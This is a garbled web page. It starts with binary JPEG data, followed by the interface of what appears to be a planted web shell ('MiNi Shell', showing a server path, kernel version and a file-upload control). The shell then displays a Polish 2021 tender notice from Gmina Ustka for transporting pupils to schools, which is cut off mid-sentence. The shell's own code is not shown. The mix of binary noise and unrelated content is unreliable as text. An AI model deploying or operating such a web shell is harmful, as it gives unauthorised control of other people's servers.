JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210622/0009039501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00090395 z dnia 2021-06-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do szkół </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wójt Gminy Ustka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979878</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dunina 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ustka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-270</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0598152455</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0598144257</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ustka.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ustka.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do szkół </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b9ddb93-d342-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00090395</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000982/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do szkół w Gminie Ustka i m. Ustka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.ustka.ug.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,ePUAPu https://epuap.gov.pl/wps/portal, zp@ustka.ug.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>miniPortaluhttps://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej, zzastrzeżeniem, że złożenie oferty oraz oświadczeń następuje wyłącznie przy użyciu<br/>miniPortalu.2.Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówieniapublicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp doformularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji.3.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, cyfrowegoodwzorowania dokumentów w postaci papierowej (elektronicznych kopii<br/>dokumentów stworzonych wpostaci papierowej) oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminiekorzystania z miniPortalu oraz Regulaminie ePUAP.4. Maksymalny<br/>rozmiar plików przesyłanych zapośrednictwem dedykowanych formularzy do: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz dokomunikacji wynosi 150 MB.5. Za datę przekazania oferty<br/>przyjmuje się datę jej przekazania naePUAP. Za datę przekazania wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lubcyfrowych odwzorowań dokumentów w postaci<br/>papierowej (elektronicznych kopii dokumentówstworzonych w postaci papierowej) oraz innych<br/>informacji przyjmuje się datę ich przekazania na adrespoczty elektronicznej Zamawiającego wskazany<br/>w pkt 9 swz.6. Dane postępowania można wyszukaćrównież na Liście wszystkich postępowań klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze stronygłównej z zakładki Postępowania na miniPortalu.7.<br/>Ofertę, sporządza się, pod rygorem nieważności, wformie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w pkt 34 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w pkt 34 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.14.2021.MA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 421018,52 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: „Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do Szkoły Podstawowej im. Ludzi Morza w Objeździe”.	<br/> 1) Przedmiotem umowy są przewozy dzieci/uczniów do Szkoły Podstawowej im. Ludzi Morza w Objeździe w okresie: od dnia 01 września 2021 roku do dnia zakończenia zajęć w dydaktycznych w roku szkolnym 2021/2022, zgodnie z kalendarzem roku szkolnego (dni nauki szkolnej - planowane zakończenie zajęć w dniu 24 czerwca 2021 roku) oraz organizacją pracy szkół, ustalonych przez dyrektora szkoły, objętych dowożeniem Zadania Nr 1: Trasa Nr 1 i Trasa Nr 2.<br/>Trasa nr 1:dowóz uczniów do Szkoły Podstawowej w Objeździe;<br/>Trasa nr 2:dowóz uczniów do Szkoły Podstawowej w Objeździe.<br/> 2) Planowaną, szacunkową liczbę dzieci dowożonych określa formularz cenowy Zał. nr 1.1 do SWZ - tj. 175 biletów (trasa nr 1 - 65 biletów, trasa nr 2 - 110 biletów).<br/> 3) Liczba dzieci dojeżdżających, wskazana w pkt. 2, została określona na podstawie aktualnej wiedzy Zamawiającego w zakresie potrzeb dowozu dzieci w okresie objętym przedmiotem umowy. Liczba dzieci ulega uaktualnieniu stosownie do alternatywnych potrzeb Zamawiającego.<br/> 4) Zamówienie obejmuje wyjazd ze wskazanego przez Zamawiającego miejsca, przejazd wyznaczoną trasą i przybycie do wyznaczonej szkoły w odpowiednim czasie przed rozpoczęciem zajęć lekcyjnych oraz odwiezienie uczniów po zajęciach lekcyjnych i dodatkowych. Dowóz i odwóz dzieci/uczniów nie może trwać dłużej niż 60 minut.<br/> 5) Usługa dowozu i odwozu będzie świadczona wg ustalonego rozkładu kursów autobusu, który będzie dostosowany do planu zajęć w szkole.<br/> 6) Wykonawca jest uprawniony do przewozu osób trzecich, wyłącznie pod warunkiem zapewnienia przewozu dla potrzeb Zamawiającego (zapewnienie miejsc siedzących dla uczniów).<br/> 7) Wykonawca zobowiązuje się do zapewnienia opiekuna. Liczba opiekunów musi być dostosowana do liczby wykonywanych kursów w taki sposób, aby w każdym wykonywanym kursie był opiekun. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 205555,56 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z<br/>formułą„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach,<br/>októrych mowa w rozdziale 16 SWZ. Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Kryterium nr 1 - cena (cena oferty brutto) – 60%.<br/>	Kryterium nr 2 – norma emisji spalin – 30%,<br/>	Kryterium nr 3 – dodatkowe usługi – 10%,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">norma emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: „Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do szkół w Gminie Ustka i m. Ustka”.<br/> 1) Przedmiotem umowy są przewozy dzieci/uczniów do szkół: Szkoły Podstawowej w Charnowie, Szkoły Podstawowej w Zaleskich i w m. Ustka w okresie: od dnia 01 września 2021 roku do dnia zakończenia zajęć dydaktycznych w roku szkolnym 2021/2022, zgodnie z kalendarzem roku szkolnego (dni nauki szkolnej) oraz organizacją pracy szkół ustalonych przez dyrektorów szkół, objętych dowożeniem Zadania Nr 2: Trasa Nr 3, Trasa Nr 4, Trasa Nr 5 i Trasa Nr 6:<br/>Trasa Nr 3 - dowóz uczniów do Szkoły Podstawowej w Charnowie i w m. Ustka,<br/>Trasa Nr 4 - dowóz uczniów do szkół w m. Ustka,<br/>Trasa Nr 5 - dowóz uczniów do Szkoły Podstawowej w Zaleskich, <br/>Trasa Nr 6 - dowóz uczniów do Szkoły Podstawowej w Zaleskich.<br/> 2) Planowaną, szacunkową liczbę dzieci dowożonych określa formularz cenowy Zał. nr 1.2 do SWZ - tj. 185 biletów (trasa nr 3 - 55 biletów, trasa nr 4 - 40 biletów, trasa nr 5 - 70 biletów, trasa nr 6 - 20 biletów).<br/> 3) Liczba dzieci dojeżdżających, wskazana w ust. 2, została określona na podstawie aktualnej wiedzy Zamawiającego w zakresie potrzeb dowozu dzieci w okresie objętym przedmiotem umowy. Liczba dzieci ulega uaktualnieniu stosownie do alternatywnych potrzeb Zamawiającego.<br/> 4) Zamówienie obejmuje wyjazd ze wskazanego przez Zamawiającego miejsca, przejazd wyznaczoną trasą i przybycie do wyznaczonej szkoły w odpowiednim czasie przed rozpoczęciem zajęć lekcyjnych oraz odwiezienie uczniów po zajęciach lekcyjnych i dodatkowych. Dowóz i odwóz dzieci/uczniów nie może trwać dłużej niż 60 minut.<br/> 5) Usługa dowozu i odwozu będzie świadczona wg ustalonego rozkładu kursów autobusu, który będzie dostosowany do planu zajęć w szkołach.<br/> 6) Wykonawca jest uprawniony do przewozu osób trzecich, wyłącznie pod warunkiem zapewnienia przewozu dla potrzeb Zamawiającego (zapewnienie miejsc siedzących dla uczniów).<br/> 7) Wykonawca zobowiązuje się do zapewnienia opiekuna. Liczba opiekunów musi być dostosowana do liczby wykonywanych kursów w taki sposób, aby w każdym wykonywanym kursie był opiekun. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 215462,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z<br/>formułą„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach,<br/>októrych mowa w rozdziale 16 SWZ. Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Kryterium nr 1 - cena (cena oferty brutto) – 60%.<br/>	Kryterium nr 2 – norma emisji spalin – 30%,<br/>	Kryterium nr 3 – dodatkowe usługi – 10%,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">norma emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt. 14 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu (art. 266 w zw. z art. 112 ustawy PZP).<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie;<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie;<br/> 3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/> 4) zdolności technicznej lub zawodowej: Wykonawca spełni warunek jeżeli wykaże, że : <br/>Część I: „Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do Szkoły Podstawowej im. Ludzi Morza w Objeździe”<br/>Część II: „Transport w zakresie dowożenia uczniów objętych obowiązkiem przedszkolnym i szkolnym do szkół w Gminie Ustka i m. Ustka”.<br/>1) dysponuje bądź będzie dysponował środkami transportu spełniającymi wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t.j. Dz.U. z 2016 r poz. 2022 z późn.zm.) oraz ustawie z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (t.j. Dz. U. z 2018 r. poz 1990 ze zm.) w następujących ilościach:<br/>a) w przypadku składania na realizację części 1 – co najmniej 2 autobusami,<br/>b) w przypadku składania na realizację części 2 – co najmniej 3 autobusami.<br/>W przypadku składania oferty na część I i część II Wykonawca powinien dysponować łącznie 5 autobusami (tj. część I + część II = 5 autobusów). <br/>2) zapewni przy realizacji zamówienia udział osób - kierowców posiadających prawo jazdy kategorii D - stosowanie do wymagań określonych art. 6 ust. 10 ustawy prawo o ruchu drogowym, mających co najmniej 3-letnie doświadczenie w kierowaniu autobusami w następujących ilościach:<br/>a) w przypadku składania na realizację części 1 – co najmniej 2 kierowców,<br/>b) w przypadku składania na realizację części 2 – co najmniej 3 kierowców.<br/>W przypadku składania oferty na część I i część II Wykonawca powinien dysponować łącznie 5 kierowcami (tj. część I + część II = 5 kierowców). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z pkt. 14.1 oraz 14.3 SWZ według treści określonej Załącznikiem nr 2 oraz załącznikiem nr 3 do SWZ a w przypadku gdy Wykonawca polega na zdolnościach podmiotu trzeciego składa oświadczenie nr 4 oraz nr 5 do SWZ.<br/>w zakresie potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej- załącznik nr 10.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z pkt. 14.1 oraz 14.3 SWZ według treści określonej Załącznikiem nr 2 oraz załącznikiem nr 3 do SWZ a w przypadku gdy Wykonawca polega na zdolnościach podmiotu trzeciego składa oświadczenie nr 4 oraz 